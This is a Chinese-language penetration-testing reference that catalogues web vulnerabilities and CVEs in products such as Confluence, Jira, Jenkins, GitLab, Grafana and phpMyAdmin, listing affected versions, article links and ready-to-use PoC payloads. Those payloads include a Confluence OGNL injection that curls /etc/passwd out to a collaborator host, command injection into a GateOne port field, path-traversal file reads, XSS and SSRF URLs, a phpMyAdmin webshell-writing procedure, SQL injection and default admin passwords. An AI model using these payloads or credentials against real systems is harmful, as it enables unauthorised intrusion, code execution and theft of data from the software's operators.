CVE-2019-3398 Atlassian Confluence Download Attachments Remote Code Execution

CVE-2021-26084

  • 相关文章- CVE-2021-26084-Confluence命令执行 全版本内存马注入
  • POC | Payload | exp- alt3kx/CVE-2021-26084_PoC- https://github.com/snowyyowl/writeups/blob/main/CVE-2021-26084.md```POST /pages/createpage-entervariables.action HTTP/1.1Host: 127.0.0.1:8090Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 215queryString=lalalala%5cu0027,(linkCreation)(0xd0ff90),%5cu0027lalalala&[email protected]@getRuntime().exec('curl -X POST --data-binary @/etc/passwd xxx.burpcollaborator.net')```

CVE-2021-26085

CVE-2022-26138

  • POC | Payload | expdisabledsystemuserdisabled1system1user6708

Crowd

官网 : https://www.atlassian.com/software/crowd

Atlassian Crowd 是一套基于 Web 的单点登录系统。该系统为多用户、网络应用程序和目录服务器提供验证、授权等功能。Atlassian Crowd Data Center 是 Crowd 的集群部署版。

CVE-2019-11580 Atlassian Crowd 未授权访问漏洞

  • 描述Atlassian Crowd 和 Crowd Data Center 在其某些发行版本中错误地启用了 pdkinstall 开发插件,使其存在安全漏洞。攻击者利用该漏洞可在未授权访问的情况下对 Atlassian Crowd 和 Crowd Data Center 安装任意的恶意插件,执行任意代码/命令,从而获得服务器权限。
  • 影响版本- Atlassian Crowd 2.1.0 ~ 3.0.5- Atlassian Crowd 3.1.0 ~ 3.1.6- Atlassian Crowd 3.2.0 ~ 3.2.8- Atlassian Crowd 3.3.0 ~ 3.3.5- Atlassian Crowd 3.4.0 ~ 3.4.4
  • 相关文章- Analysis of an Atlassian Crowd RCE - CVE-2019-11580- CVE-2019-11580 RCE漏洞分析
  • POC | Payload | exp- jas502n/CVE-2019-11580

Django

CVE-2020-7471 Django StringAgg SQL Injection漏洞

  • 相关文章 - CVE-2020-7471 Django StringAgg SQL Injection漏洞复现

DolphinScheduler

官网 : https://dolphinscheduler.apache.org/zh-cn/

Apache DolphinScheduler(目前处在孵化阶段)是一个分布式、去中心化、易扩展的可视化DAG工作流任务调度系统,其致力于解决数据处理流程中错综复杂的依赖关系,使调度系统在数据处理流程中开箱即用。

默认密码

admin dolphinscheduler

CVE-2020-13922 权限覆盖漏洞

  • POC | Payload | expPOST /dolphinscheduler/users/updateid=1&userName=admin&userPassword=Password1!&tenantId=1&email=sdluser%40sdluser.sdluser&phone=

flask

  • flask

FlySpray

官网 : http://www.flyspray.org/

XSRF Stored FlySpray 1.0-rc4 (XSS2CSRF add admin account)

  • POC | Payload | exp - FlySpray 1.0-rc4 - Cross-Site Scripting / Cross-Site Request Forgery

GateOne

Fofa : app="GateOne"

相关文章

  • 从RCE到CVE:攻防实战中的漏洞挖掘

CVE-2020-20184 rce

  • POC | Payload | expGateOne.ws.send('{"terminal:ssh_get_host_fingerprint":{"host":"目标IP","port":"22;cat /etc/passwd;"}}')

CVE-2020-35736 GateOne 路径遍历漏洞

  • POC | Payload | exp/auth?next=%2F/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

Gerapy

相关文章

  • Gerapy项目 的二次漏洞挖掘

CVE-2021-32849

  • 影响版本- Gerapy <= 0.9.6
  • 相关文章- Gerapy clone 后台远程命令执行漏洞 CVE-2021-32849

Gitea

https://gitea.io/

Gitea 1.4.0 目录穿越导致命令执行漏洞


GitLab

https://about.gitlab.com/install/

GitLab 的漏洞情报参考 https://gitlab.com/gitlab-org/cves/-/tree/master

CVE-2020-10977 GitLab 任意文件读取漏洞

  • 影响范围- 8.5 <= GitLab CE/EE <=12.9
  • 相关文章- GitLab任意文件读取漏洞复现- Arbitrary file read via the UploadsRewriter when moving and issue

CVE-2021-4191

CVE-2021-22205

  • 影响范围- 11.9.0 <= Gitlab CE/EE < 13.8.8- 13.9.0 <= Gitlab CE/EE < 13.9.6- 13.10.0 <= Gitlab CE/EE < 13.10.3
  • 相关文章- gitlab CVE-2021-22205 RCE 复现- GitLab未授权+恶意图片命令执行【复现】- CVE-2021-22204 GitLab RCE之exiftool代码执行漏洞深入分析(二)
  • POC | Payload | exp- mr-r3bot/Gitlab-CVE-2021-22205- inspiringz/CVE-2021-22205

CVE-2021-22214

CVE-2022-2185

CVE-2022-2884

  • 影响范围 11.3.4 <= GitLab CE/EE < 15.1.5 15.2 <= GitLab CE/EE < 15.2.3 15.3 <= GitLab CE/EE < 15.3.1

glpi

项目地址: https://github.com/glpi-project/glpi
fofa: app="TECLIB-GLPI"

CVE-2022-35914 GLPI htmLawedTest.php 远程命令执行漏洞

  • 影响范围 GLPI <= 10.0.2
  • 相关文章- GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914

GoAhead

CVE-2017-17562

CVE-2021-42342

  • 影响范围- GoAhead =4.x- 5.x<=GoAhead<5.1.5
  • 相关文章- CVE-2021-42342 GoAhead 远程命令执行漏洞深入分析与复现

GoCD

未授权路径穿越

  • 相关文章 - GoCD 存在未授权路径穿越漏洞

Gogs

相关工具

  • TheZ3ro/gogsownz

CVE-2018-18925

  • 相关文章 - Gogs 任意用户登录漏洞(CVE-2018-18925)

CVE-2018-20303

  • 相关文章 - gogs/gitea CVE-2018-20303文件上传到RCE漏洞分析

Grafana

fofa: app="Grafana"

默认用户名密码

  • admin/admin

Grafana 6.4.3 Arbitrary File Read

  • 相关文章 - Grafana 6.4.3 Arbitrary File Read

CVE-2020-13379

  • 相关文章 - CVE-2020-13379

CVE-2021-41174

  • 相关文章 - Grafana 8.2.3 released with medium severity security fix: CVE-2021-41174 Grafana XSS

CVE-2021-43798

  • 影响版本- Grafana 8.3.x < 8.3.1- Grafana 8.2.x < 8.2.7- Grafana 8.1.x < 8.1.8- Grafana 8.0.x < 8.0.7
  • 相关文章- grafana最新任意文件读取分析以及衍生问题解释- Grafana未授权路径穿越导致任意文件读取漏洞分析- Grafana plugin 任意文件读取漏洞( CVE-2021-43798 )分析复现- 漏洞分析|CVE-2021-43798 - Grafana文件读取漏洞
  • POC | Payload | exp- jas502n/Grafana-VulnTips- A-D-Team/grafanaExp

8.x . CSRF

  • 相关文章 - 0-day Cross Origin Request Forgery vulnerability in Grafana 8.x .

GraphQL

相关文章

  • GraphQL安全指北
  • GraphQL安全总结与测试技巧
  • GraphQL漏洞笔记及案例
  • GraphQL IDOR leads to information disclosure
  • GraphQL - Security Overview and Testing Tips
  • How to exploit GraphQL endpoint: introspection, query, mutations & tools
  • Securing GraphQL. Part 1
  • Why and how to disable introspection query for GraphQL APIs
  • GraphQL Batching Attack
  • GraphQL Batching Attacks: Turbo Intruder

相关工具

  • swisskyrepo/GraphQLmap
  • doyensec/inql - 用于 GraphQL 安全测试的扩展
  • APIs-guru/graphql-voyager - Represent any GraphQL API as an interactive graph - https://apis.guru/graphql-voyager/
  • nikitastupin/clairvoyance - Obtain GraphQL API schema despite disabled introspection!

相关案例

  • H1514 [beerify.shopifycloud.com] GraphQL discloses internal beer consumption

相关靶场

  • dolevf/Damn-Vulnerable-GraphQL-Application - Damn Vulnerable GraphQL Application is an intentionally vulnerable implementation of Facebook's GraphQL technology, to learn and practice GraphQL Security.git clone https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application.git && cd Damn-Vulnerable-GraphQL-Applicationdocker build -t dvga .docker run -t -p 5013:5013 -e WEB_HOST=0.0.0.0 dvga
  • righettod/poc-graphql - Research on GraphQL from an AppSec point of view.

introspection/自省

Introspection is the ability to query which resources are available in the current API schema. Given the API, via introspection, we can see the queries, types, fields, and directives it supports.

由于自省机制,默认情况下,任何未经身份验证的用户都可以分析 GrapQL 模式。Introspection 允许我们获取有关所有请求、mutation、订阅和数据类型的信息,以及向发出请求的客户端提供的所有其他信息。通过请求 ___schema 元字段可以轻松获得此信息,根据规范,该信息始终可用于“root”类型的查询。

Content-Type: application/json

{"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}

Harbor

官网 : https://goharbor.io/

Harbor 的漏洞情报参考 https://github.com/goharbor/harbor/security/advisories

相关文章

  • 云原生服务风险测绘分析(二): Harbor

CVE-2019-3990 User Enumeration Vulnerability

CVE-2019-16097 任意管理员注册漏洞

CVE-2019-19030

CVE-2020-13788 ssrf

  • 描述harbor 的 "Test Endpoint" API 在设计上存在脆弱性,可能会导致攻击者使用此 API 对 Harbor 服务器内部网络主机上开放的 TCP 端口进行扫描,从而使攻击者能够对内网资产进行探测。
  • POC | Payload | exp- https://www.youtube.com/watch?v=v8Isqy4yR3Q

CVE-2020-13794

CVE-2020-29662


HFS

HFS远程命令执行漏洞

  • 描述Rejetto HTTP File Server 2.3c及之前版本中的parserLib.pas文件中的‘findMacroMarker’函数中存在安全漏洞,该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的‘%00’序列利用该漏洞执行任意程序。
  • 案例- 记一次SSRF+HFS命令执行回显相关研究
  • POC | Payload | exp/?search==%00{.exec|cmd.exe /c [Command-String].}

Horde_Groupware_Webmail

Horde Groupware Webmail Edition 远程命令执行

  • 描述Horde Groupware Webmail 是美国 Horde 公司的一套基于浏览器的企业级通信套件。 Horde Groupware Webmail 中存在代码注入漏洞。该漏洞源于外部输入数据构造代码段的过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流。
  • POC | Payload | exp- https://srcincite.io/pocs/zdi-20-1051.py.txt

HUE

命令执行漏洞

  • POC | Payload | expHue 后台编辑器存在命令执行漏洞,攻击者通过编辑上传 xxx.sh 文件即可达到命令执行的目的

ixcache

FOFA:title="iXCache"

默认口令

admin
ixcache

jellyfin

fofa: title="jellyfin"

CVE-2020-26948 ssrf

  • 描述Emby Server 4.5.0之前的版本允许通过Items/RemoteSearch/Image ImageURL参数进行SSRF。
  • POC | Payload | exp- btnz-k/emby_ssrf

CVE-2021-21402

CVE-2021-29490

  • POC | Payload | exp/Images/Remote?imageUrl=<URL>/Items/RemoteSearch/Image?ImageUrl=<URL>&ProviderName=TheMovieDB

Jenkins

官网 : https://jenkins.io/

app="Jenkins"

Jenkins 的漏洞情报参考 https://jenkins.io/security/advisories/

搭建教程

  • Jenkins 搭建

相关文章

  • Hacking Jenkins Part 1 - Play with Dynamic Routing
  • Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!
  • Jenkins RCE漏洞分析汇总
  • 安全研究 | Jenkins漏洞分析

资源

  • gquere/pwn_jenkins: Notes about attacking Jenkins servers
  • petercunha/jenkins-rce

相关工具

  • blackye/Jenkins - Jenkins漏洞探测、用户抓取爆破

未授权访问漏洞

  • 描述默认情况下 Jenkins 面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。
  • 相关文章- 知其一不知其二之Jenkins Hacking
  • 利用http://[ip]:8080/manage

CVE-2017-1000353 未授权远程代码执行漏洞

  • 描述Jenkins 未授权远程代码执行漏洞, 允许攻击者将序列化的 Java SignedObject 对象传输给 Jenkins CLI 处理,反序列化 ObjectInputStream 作为 Command 对象,这将绕过基于黑名单的保护机制, 导致代码执行。
  • 影响版本- jenkins < 2.56
  • POC | Payload | exp- vulhub/CVE-2017-1000353

CVE-2018-1000861 远程命令执行漏洞

  • 描述Jenkins 使用 Stapler 框架开发,其允许用户通过 URL PATH 来调用一次 public 方法.由于这个过程没有做限制,攻击者可以构造一些特殊的 PATH 来执行一些敏感的 Java 方法.通过这个漏洞,我们可以找到很多可供利用的利用链.其中最严重的就是绕过 Groovy 沙盒导致未授权用户可执行任意命令:Jenkins 在沙盒中执行 Groovy 前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过 Meta-Programming 的方式,在检查这个步骤时执行任意命令.
  • 影响版本- jenkins < 2.153
  • POC | Payload | exp- orangetw/awesome-jenkins-rce-2019

CVE-2018-1999001 配置文件路径改动导致管理员权限开放漏洞

  • 描述Jenkins 官方在 7 月 18 号发布了安全公告,对 Jenkins 的两个高危漏洞进行通告,其中包括配置文件路径改动导致管理员权限开放的漏洞 CVE-2018-1999001,未授权用户通过发送一个精心构造的登录凭据,能够致使匿名用户获取 Jenkins 的管理权限。
  • 影响版本- jenkins < 2.121.1- jenkins 2.122 ~ 2.132
  • 相关文章- Jenkins配置文件路径改动导致管理员权限开放漏洞(CVE-2018-1999001)

CVE-2018-1999002 任意文件读取漏洞

  • 描述Jenkins 7 月 18 日的安全通告修复了多个漏洞,其中 SECURITY-914 是未授权任意文件读取漏洞。攻击者可以发送精心制作的 HTTP 请求,以返回 Jenkins 主文件中任何文件的内容,该漏洞存在于 Stapler Web 框架的 org/kohsuke/stapler/Stapler.java 中。
  • 影响版本- jenkins < 2.121.1- jenkins 2.122 ~ 2.132
  • 相关文章- 安全研究 | Jenkins 任意文件读取漏洞分析- Jenkins任意文件读取漏洞(CVE-2018-1999002)复现记录

CVE-2019-1003000 未授权访问 RCE 漏洞

  • 描述脚本安全插件 1.49 和更早版本的 src/main/Java/org/jenkinsci/plugins/Script Security/sandbox/groovy/GroovysandBox.Java 中存在沙箱绕过漏洞,使得攻击者能够提供沙箱脚本在 Jenkins 主 JVM 上执行任意代码。
  • 影响版本- jenkins < 1.49
  • 相关文章- Jenkins未授权访问RCE漏洞复现记录 | angelwhu_blog- Jenkins RCE CVE-2019-1003000 漏洞复现
  • POC | Payload | exp- adamyordan/cve-2019-1003000-jenkins-rce-poc: Jenkins RCE Proof-of-Concept: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)

CVE-2019-10320 CloudBees Jenkins Credentials Plugin 信息泄露漏洞

  • 描述CloudBees Jenkins(Hudson Labs)是美国CloudBees公司的一套基于Java开发的持续集成工具。该产品主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。Credentials Plugin 是使用在其中的一个身份凭据存储插件。 Jenkins Credentials Plugin 2.1.18 及之前版本中存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。
  • 影响版本- jenkins < 2.1.18
  • 相关文章- Exploring the File System via Jenkins Credentials Plugin Vulnerability - CVE-2019-10320 | Nightwatch Cybersecurity

CVE-2019-10392 RCE with Git Client Plugin 2.8.2 (Authenticated)

  • POC | Payload | exp - jas502n/CVE-2019-10392

Jira

官网 : https://www.atlassian.com/software/jira

JIRA 是 Atlassian 公司出品的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。

jira 的漏洞情报参考 https://jira.atlassian.com/browse/JRASERVER-69858?filter=13085

相关工具

  • bcoles/jira_scan
  • MayankPandey01/Jira-Lens - Fast and customizable vulnerability scanner For JIRA written in Python

CVE-2017-9506 ssrf

  • POC | Payload | exp/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_PAYLOAD>

CVE-2018-20824 xss

  • POC | Payload | exp/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)

CVE-2019-3402 xss

  • POC | Payload | exp/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search

CVE-2019-3403 信息泄露(用户名枚举)

  • 描述Atlassian Jira 7.13.3 之前版本、8.0.4 之前版本和 8.1.1 之前版本中存在用户名枚举漏洞,攻击者可利用该漏洞枚举用户名称。
  • 影响版本- Atlassian Jira < 7.13.3- Atlassian Jira 8.0.0 ~ 8.0.4- Atlassian Jira 8.1.0 ~ 8.1.1
  • POC | Payload | exp- /rest/api/2/user/picker?query=<USERNAME_HERE>- https://blog.csdn.net/caiqiiqi/article/details/100094987

CVE-2019-8442 Jira 未授权敏感信息泄露

  • 描述Atlassian Jira 是澳大利亚 Atlassian 公司的一套缺陷跟踪管理系统. 该系统主要用于对工作中各类问题、缺陷进行跟踪管理. Atlassian Jira 7.13.4 之前版本、8.0.4 之前版本和 8.1.1 之前版本中的 CachingResourceDownloadRewriteRule 类存在安全漏洞. 远程攻击者可利用该漏洞访问 Jira webroot 中的文件.
  • 影响版本- Atlassian Jira < 7.13.3- Atlassian Jira 8.0.0 ~ 8.0.4- Atlassian Jira 8.1.0 ~ 8.1.1
  • POC | Payload | exp- https://note.youdao.com/ynoteshare1/index.html?id=4189e6fb21fb097a4109ac22f33b16cb&type=note- https://hackerone.com/reports/632808- /s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml

CVE-2019-8444 存储型 XSS

  • 描述Atlassian Jira 7.13.6之前版本和8.3.2之前的8.x版本中的 wikirenderer 组件存在跨站脚本漏洞。该漏洞源于 WEB 应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
  • 影响版本- Atlassian Jira 7.7 ~ 7.13.6- Atlassian Jira 8.0.0 ~ 8.3.2
  • POC | Payload | expPOST /rest/api/2/issue/TEST-7/comment HTTP/1.1Content-Type: application/json{"body":"!image.png|width=\\\" οnmοuseοver=alert(333);//!"}

CVE-2019-8446 信息泄露(用户名枚举)

CVE-2019-8449

  • POC | Payload | exp - /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true- mufeedvh/CVE-2019-8449

CVE-2019-8451 Jira 未授权 SSRF 漏洞

  • 描述Atlassian Jira 8.4.0 之前版本中的 /plugins/servlet/gadgets/makeRequest 资源存在代码问题漏洞。该漏洞源于网络系统或产品的代码开发过程中存在设计或实现不当的问题。
  • 影响版本- Atlassian Jira 7.6.0 ~ 8.4.0
  • POC | Payload | exp- /plugins/servlet/gadgets/makeRequest?url=https://victomhost:[email protected]- jas502n/CVE-2019-8451

CVE-2019-11581 Atlassian Jira 模板注入漏洞

  • 描述Atlassian Jira 多个版本前存在利用模板注入执行任意命令
  • 影响版本- Atlassian Jira 4.4 ~ 7.6.14- Atlassian Jira 7.7.0 ~ 7.13.5- Atlassian Jira 8.0.0 ~ 8.0.3- Atlassian Jira 8.1.0 ~ 8.1.2- Atlassian Jira 8.2.0 ~ 8.2.3
  • 相关文章- Atlassian Jira 模板注入漏洞 (CVE-2019-11581)

CVE-2020-14179 Information Disclosure

  • POC | Payload | exp/secure/QueryComponent!Default.jspa

CVE-2020-14181 User Enumeration

  • POC | Payload | exp/secure/ViewUserHover.jspa?username=<USERNAME>

CVE-2020-36289

  • POC | Payload | exp/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin

CVE-2021-26086

  • 相关文章- Jira 敏感信息泄漏复现 (CVE-2021-26086)
  • 影响版本- Atlassian Jira < 8.5.14- Atlassian Jira 8.6.0 ~ 8.13.6- Atlassian Jira 8.14.0 ~ 8.16.1
  • POC | Payload | exp/s/cfx/_/;/WEB-INF/web.xml/s/cfx/_/;/WEB-INF/decorators.xml/s/cfx/_/;/WEB-INF/classes/seraph-config.xml/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties

CVE-2021-43947

  • 相关文章 - CVE-2021-43947 Atlassian Jira Server Velocity SSTI漏洞绕过分析

CVE-2022-26135 Atlassian Jira Mobile Plugin SSRF

  • 相关文章- CVE-2022-26135 Atlassian Jira Mobile Plugin SSRF 漏洞
  • POC | Payload | exp- assetnote/jira-mobile-ssrf-exploit

JumpServer

JumpServer远程执行漏洞

  • 相关文章- JumpServer远程执行漏洞 复现- JumpServer远程命令执行你可能不知道的点(附利用工具)
  • POC | Payload | exp- Skactor/jumpserver_rce- Veraxy00/Jumpserver-EXP

Jupyter

官网 : https://jupyter.org/

Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。

未授权访问漏洞

  • 描述如果管理员未为 Jupyter Notebook 配置密码,将导致未授权访问漏洞,游客可在其中创建一个 console 并执行任意 Python 代码和命令。
  • 示例http://[ip]:8888

Kibana

CVE-2018-17246 Kibana Local File Inclusion

CVE-2019-7609


KodExplorer

fofa: app="Powered-by-KodExplorer"
fofa: icon_hash="1636007688"

kodexplorer 4.32 SSRF漏洞

  • POC | Payload | exp/index.php?app/getUrlTitle&url=192.168.1.1# 通过返回的时间判断是否存活

Reflected xss

svg ssrf

  • POC | Payload | exp<?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style="overflow: hidden; position: relative;" width="300" height="200"><image x="10" y="10" width="276" height="110" xlink:href="http://127.0.0.1:8000/svg" stroke-width="1" id="image3204" /><rect x="0" y="150" height="10" width="300" style="fill: black"/></svg>

svg xss

  • POC | Payload | exp<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /><script type="text/javascript"> alert(document.domain);</script></svg>

Konga

Konga任意用户登录

  • 相关文章 - Konga任意用户登录分析

MetaBase

fofa: app="Metabase"

CVE-2021-41277 MetaBase任意文件读取漏洞

  • 相关文章- CVSS 10.0|MetaBase任意文件读取漏洞【无需认证】(CVE-2021-41277)- MetaBase 任意文件读取漏洞(CVE-2021-41277) 复现
  • 影响版本- MetaBase < 0.40.5- 1.0.0 <= MetaBase < 1.40.5
  • POC | Payload | exp/api/geojson?url=file:/etc/passwd- Seals6/CVE-2021-41277

MinIO

fofa: app="MinIO-Console"

CVE-2021-21287 MinIO未授权SSRF漏洞

  • 相关文章 - 容器与云的碰撞——一次对MinIO的测试

CVE-2021-41266


Moodle

fofa: app="moodle"

CVE-2021-36393

  • 相关文章 - Moodle: Blind SQL Injection (CVE-2021-36393) and Broken Access Control (CVE-2021-36397)

CVE-2021-36394

  • 相关文章 - CVE-2021-36394-Moodle RCE漏洞分析及PHP反序列化利用链构造之旅

CVE-2021-40691

  • 相关文章 - Pre-Auth RCE in Moodle Part II - Session Hijack in Moodle's Shibboleth- CVE-2021-40691 Moodle Shibboleth未授权session会话劫持漏洞

CVE-2022-0332

  • 相关文章 - CVE-2022-0332 Moodle REST Web接口审计与H5P插件SQL注入漏洞分析

Nagios

CVE-2022-29272


Nexus

官网 : https://www.sonatype.com/product-nexus-repository

默认密码

admin   admin123

CVE-2019-7238 Nexus Repository Manager 3 Remote Code Execution without authentication < 3.15.0

  • 描述Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发 Maven、NuGET 等软件源仓库.其 3.14.0 及之前版本中,存在一处基于 OrientDB 自定义函数的任意 JEXL 表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞.
  • 影响版本- nexus < 3.15.0
  • 相关文章- 一次偶遇Nexus- Nexus Repository Manager 3 远程命令执行漏洞 (CVE-2019-7238)
  • POC | Payload | exp- mpgn/CVE-2019-7238- jas502n/CVE-2019-7238

CVE-2020-10199/CVE-2020-10204

  • 相关文章- Nexus Repository Manager(CVE-2020-10199/10204)漏洞分析及回显利用方法的简单讨论
  • POC | Payload | exp- aleenzz/CVE-2020-10199

CVE-2020-29436

  • 相关文章 - CVE-2020-29436:Nexus3 XML外部实体注入复现

NiFi

Fofa: "nifi" && title=="NiFi"

NiFi 未授权

  • POC | Payload | exp/nifi//nifi-api/flow/current-user/nifi-api/flow/process-groups/root/nifi-api/access/config

NiFi Api 远程代码执行

  • POC | Payload | exp - imjdl/Apache-NiFi-Api-RCEuse exploit/multi/http/apache_nifi_processor_rce

nodejs

  • nodejs

noVNC

官网 : https://novnc.com

CVE-2017-18635 xss

  • 描述noVNC 是一款 HTML VNC(Virtual Network Computing)客户端库。 noVNC 0.6.2之前版本中存在跨站脚本漏洞。该漏洞源于 WEB 应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
  • 影响版本- novnc < 0.6.2
  • 相关文章- Exploiting an old noVNC XSS (CVE-2017-18635) in OpenStack
  • POC | Payload | exp- ShielderSec/cve-2017-18635

nps

nps认证绕过漏洞

  • 漏洞利用工具 - carr0t2/nps-auth-bypass

OFBiz

Fofa: app="Apache_OFBiz"

CVE-2020-9496 Ofbiz反序列化漏洞

CVE-2021-26295 RMI反序列化漏洞

  • 相关文章- Apache OFBiz 漏洞复现 (2021-26295/2020-9496)
  • POC | Payload | exp- Apache OFBiz RMI反序列化漏洞 CVE-2021-26295

CVE-2021-29200 Apache OFBiz RMI Bypass RCE

  • 相关文章- 【漏洞分析】CVE-2021-29200 Apache OFBiz RMI Bypass RCE 分析
  • POC | Payload | exp- r0ckysec/CVE-2021-29200

CVE-2021-30128

  • 相关文章- Apache OFBiz 反序列化漏洞预警(CVE-2021-30128)- 【漏洞分析】CVE-2021-30128 Apache OFBiz 反序列化漏洞
  • POC | Payload | exp- r0ckysec/CVE-2021-30128

OpenAM

fofa: app="OpenAM"

CVE-2021-29156

  • 相关文章 - CVE-2021-29156-ForgeRock OpenAm Webfinger协议 LDAP注入漏洞

CVE-2021-35464

  • 相关文章 - Java反序列化之ForgeRock OpenAM CVE-2021-35464漏洞分析

phpMyAdmin

官网: https://www.phpmyadmin.net/

搭建教程

  • phpMyAdmin 搭建

相关文章

  • phpMyadmin各版本漏洞 - 2/3 老版本的漏洞
  • phpMyAdmin后台Getshell总结

通过 phpmyadmin 来 getshell

  • 确认绝对路径利用 log 变量,猜绝对路径或者直接查询 select @@basedir;直接 SQL 写文件 select '<?php phpinfo(); ?>' INTO OUTFILE 'C:/phpStudy/PHPTutorial/WWW/a.php';如果 file_priv 为 null,那么是写不了的,可以尝试使用日志写马set global general_log='on';set global general_log_file='C:/phpStudy/PHPTutorial/WWW/a.php';select '<?php phpinfo(); ?>';set global general_log=off;参考 : phpMyAdmin新姿势getshell

CVE-2016-5734 4.0.x—4.6.2 远程代码执行漏洞

  • 描述phpMyAdmin 中存在安全漏洞,该漏洞源于程序没有正确选择分隔符来避免使用 preg_replacee 修饰符。远程攻击者可借助特制的字符串利用该漏洞执行任意 PHP 代码。以下版本受到影响:phpMyAdmin4.0.10.16之前4.0.x版本,4.4.15.7之前4.4.x版本,4.6.3之前4.6.x版本。
  • 影响版本- phpmyadmin 4.0.0 ~ 4.0.10.15- phpmyadmin 4.4.0 ~ 4.4.15.6- phpmyadmin 4.6.0 ~ 4.6.2
  • POC | Payload | exp- phpMyAdmin 4.6.2 - (Authenticated) Remote Code Execution

phpMyAdmin 4.7.x CSRF

  • 相关文章 - phpMyAdmin 4.7.x CSRF 漏洞利用

CVE-2018-12613 4.8.x 本地文件包含漏洞利用

  • 相关文章 - phpMyAdmin 4.8.x 本地文件包含漏洞利用 | Vulnspy Blog 可以通过这个线上靶场实验,不过 docker 镜像可能有点问题,mysql 进程起不起来,我的解决方式是直接卸了重装 mysql-server,而且他默认的 apt 源无法访问,还要换一下 apt 源- phpmyadmin4.8.1后台getshell- CVE-2018-12613漏洞学习总结

CVE-2019-6799

  • 相关文章- phpMyAdmin任意文件读取漏洞复现(CVE-2019-6799)以及检测POC编写
  • POC | Payload | expGifts/Rogue-MySql-Servervim rogue_mysql_server.pyPORT = 3307``````python rogue_mysql_server.py打开目标 phpMyAdmin 的登录页面,地址输入 db:3307、用户名、密码,提交登录.回到 db 的终端,如果文件读取成功会将文件内容记录到 mysql.log 文件中

CVE-2019-12922 4.9.0.1 CSRF

  • 描述phpMyAdmin 4.9.0.1 版本中存在跨站请求伪造漏洞。该漏洞源于 WEB 应用未充分验证请求是否来自可信用户。攻击者可利用该漏洞通过受影响客户端向服务器发送非预期的请求。
  • 影响版本- phpmyadmin 4.9.0.1
  • POC | Payload | exp- <img src=" http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1" style="display:none;" />- https://www.hedysx.com/bug/2398.html

CVE-2019-18622 xss

CVE-2020-26935 phpmyadmin后台SQL注入

  • POC | Payload | exp/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1)

CVE-2022-23808 phpMyAdmin 5.1.1 - XSS (Cross-site Scripting)


PHP

CVE-2012-1823 PHPCGI 远程代码执行漏洞

  • 描述5.3.12 之前和 5.4.2 之前的 5.4.x 中的 sapi/cgi/cgi_main.c 在配置为 CGI 脚本(aka php-cgi)时,不能正确处理缺少=(等号)字符的查询字符串 ,它允许远程攻击者通过在查询字符串中放置命令行选项来执行任意代码,这与在"d"情况下缺少跳过某些 php_getopt 有关。
  • 影响版本- php < 5.3.12- php < 5.4.2
  • 相关文章- PHP-CGI远程代码执行漏洞 (CVE-2012-1823) 分析
